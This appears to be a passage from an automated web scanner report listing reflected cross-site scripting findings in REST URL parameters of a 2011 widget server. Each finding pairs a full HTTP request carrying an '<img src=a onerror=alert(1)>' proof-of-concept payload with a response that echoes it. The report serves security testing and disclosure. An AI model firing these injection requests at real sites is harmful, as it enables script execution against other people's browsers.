GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/51135bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:31 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/51135bcaa<img src=a onerror=alert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecod
...[SNIP]...
3.23. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 69f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8 was submitted in the REST URL parameter 12. This input was echoed as 69f84<img src=a onerror=alert(1)>faa1bc042a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/183831369f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:38 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
75","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/183831369f84<img src=a onerror=alert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;li
...[SNIP]...
3.24. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 13 is copied into the HTML document as plain text between tags. The payload 7ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a was submitted in the REST URL parameter 13. This input was echoed as 7ba35<img src=a onerror=alert(1)>b5fe03ca28a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/07ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:45 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/07ba35<img src=a onerror=alert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link
...[SNIP]...
3.25. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 9ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2 was submitted in the REST URL parameter 14. This input was echoed as 9ec74<img src=a onerror=alert(1)>e70d7034ce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:52 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
latform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img src=a onerror=alert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},
...[SNIP]...
3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 15 is copied into the HTML document as plain text between tags. The payload 16922<img%20src%3da%20onerror%3dalert(1)>f636662a426 was submitted in the REST URL parameter 15. This input was echoed as 16922<img src=a onerror=alert(1)>f636662a426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img%20src%3da%20onerror%3dalert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
rm":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img src=a onerror=alert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},


...[SNIP]...
3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8 was submitted in the REST URL parameter 4. This input was echoed as 467b6<img src=a onerror=alert(1)>6c593df3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18572


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
GETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif467b6<img src=a onerror=alert(1)>6c593df3db8":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8
...[SNIP]...
3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0 was submitted in the REST URL parameter 5. This input was echoed as e8572<img src=a onerror=alert(1)>efc59e097e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aole8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aole8572<img src=a onerror=alert(1)>efc59e097e0"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8250813
...[SNIP]...
3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc was submitted in the REST URL parameter 6. This input was echoed as 1abe0<img src=a onerror=alert(1)>6a7add9aecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","fif":"aol","id1abe0<img src=a onerror=alert(1)>6a7add9aecc":"8f8e2793-e99e-41bf-8b75-95ef3e434575"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/
...[SNIP]...
3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb was submitted in the REST URL parameter 7. This input was echoed as 3ffef<img src=a onerror=alert(1)>0560571b3eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img src=a onerror=alert(1)>0560571b3eb","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0
...[SNIP]...
